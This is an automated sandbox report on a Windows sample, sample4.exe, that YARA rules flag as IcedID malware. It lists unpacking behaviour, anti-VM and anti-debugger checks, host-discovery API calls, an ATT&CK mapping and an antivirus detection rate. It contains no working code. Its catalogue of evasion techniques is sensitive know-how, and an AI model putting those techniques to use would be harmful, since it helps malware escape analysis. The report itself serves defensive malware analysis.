Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdbR source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: webio.pdbr source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: ncryptsslp.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb: source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb^ source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbX source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb_ source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbF source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdbj source: WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp
Source:	Binary string: fwpuclnt.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: webio.pdb< source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.373517949.0000000004FC0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.392471616.0000000004C70000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416196678.00000000052E0000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441883039.0000000005770000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462446132.0000000005670000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb0 source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.373522458.0000000004FC5000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391461414.0000000004C72000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416001893.00000000052E2000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441781418.0000000005772000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462324420.0000000005672000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.373489768.0000000004FC8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.416249388.00000000052E9000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.441899613.0000000005779000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb9 source: WerFault.exe, 00000015.00000003.391486327.0000000004C79000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.373470183.0000000004EC1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.392291844.0000000004CA1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.416079337.0000000005311000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.441828979.0000000005681000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.462365505.00000000056A1000.00000004.00000001.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 00000023.00000003.462334524.0000000005679000.00000004.00000040.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\sample4.exe

Unpacked PE file: 0.2.sample4.exe.d0000.0.unpack .text:ER;.data:W;.idata:R;.gfids:R;.giats:R;.tls:W;.rsrc:R;.reloc:R; vs .text:ER;bss:W;.rdata:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\sample4.exe

Unpacked PE file: 0.2.sample4.exe.d0000.0.unpack

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D1ECF wsprintfW,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,

0_2_000D1ECF

Source: sample4.exe

Static PE information: section name: .giats

Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_002496F8 push ecx; ret		0_2_0024970B
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00249856 push ecx; ret		0_2_00249869

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D18E0 SwitchToThread,__aulldiv,

0_2_000D18E0

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D18E0 rdtsc

0_2_000D18E0

Source: C:\Users\user\Desktop\sample4.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-26757

Source: C:\Users\user\Desktop\sample4.exe

API coverage: 8.6 %

Source: C:\Users\user\Desktop\sample4.exe TID: 1180

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\sample4.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_00125BE6 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,

0_2_00125BE6

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_00116FA9 GetEnvironmentVariableW,GetSystemInfo,FindFirstChangeNotificationW,GetEnvironmentVariableW,

0_2_00116FA9

Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000011.00000002.378751405.0000000004C30000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.400669986.0000000002C90000.00000002.00000001.sdmp, WerFault.exe, 00000019.00000002.423433375.0000000004FA0000.00000002.00000001.sdmp, WerFault.exe, 00000020.00000002.447854535.0000000005A10000.00000002.00000001.sdmp, WerFault.exe, 00000023.00000002.469042458.0000000005470000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\sample4.exe

API call chain: ExitProcess graph end node

graph_0-26731

Source: C:\Users\user\Desktop\sample4.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\sample4.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D18E0 rdtsc

0_2_000D18E0

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_0024F646 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0024F646

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_001183DE OutputDebugStringA,GetLastError,

0_2_001183DE

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D1ECF wsprintfW,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,

0_2_000D1ECF

Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0025D81F mov eax, dword ptr fs:[00000030h]	0_2_0025D81F
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_00259EEC mov eax, dword ptr fs:[00000030h]	0_2_00259EEC
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0028FB73 mov eax, dword ptr fs:[00000030h]	0_2_0028FB73
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0028FB73 mov eax, dword ptr fs:[00000030h]	0_2_0028FB73
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0028F73F push dword ptr fs:[00000030h]	0_2_0028F73F
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_013004FD mov eax, dword ptr fs:[00000030h]	0_2_013004FD
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_013004FD mov eax, dword ptr fs:[00000030h]	0_2_013004FD
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_013000C9 push dword ptr fs:[00000030h]	0_2_013000C9

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D121E GetCommandLineA,StrStrIA,StrToIntA,GetTempPathA,wsprintfA,GetProcessHeap,HeapFree,

0_2_000D121E

Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_0024F646 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0024F646
Source: C:\Users\user\Desktop\sample4.exe	Code function: 0_2_002498CA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_002498CA

Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: sample4.exe, 00000000.00000002.572528127.0000000001CB0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D18E0 cpuid

0_2_000D18E0

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_000D1DD9 wsprintfW,GetComputerNameExA,GetUserNameA,wsprintfW,wsprintfW,wsprintfW,

0_2_000D1DD9

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_0025BCE8 GetTimeZoneInformation,

0_2_0025BCE8

Source: C:\Users\user\Desktop\sample4.exe

Code function: 0_2_00131386 RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,RegisterClipboardFormatW,SendMessageW,__EH_prolog3_GS,GetVersionExW,_wcschr,

0_2_00131386

Stealing of Sensitive Information:

Yara detected IcedID

Show sources

Source: Yara match

File source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY

Yara detected IcedID

Show sources

Source: Yara match	File source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected IcedID

Show sources

Source: Yara match

File source: Process Memory Space: sample4.exe PID: 2100, type: MEMORY

Yara detected IcedID

Show sources

Source: Yara match	File source: 00000000.00000003.362692606.0000000001320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.sample4.exe.d0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API2	Path Interception	Process Injection2	Virtualization/Sandbox Evasion2	Input Capture11	System Time Discovery1	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection2	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Security Software Discovery151	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Virtualization/Sandbox Evasion2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing2	LSA Secrets	Process Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	File and Directory Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Information Discovery113	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sample4.exe	77%	Virustotal		Browse
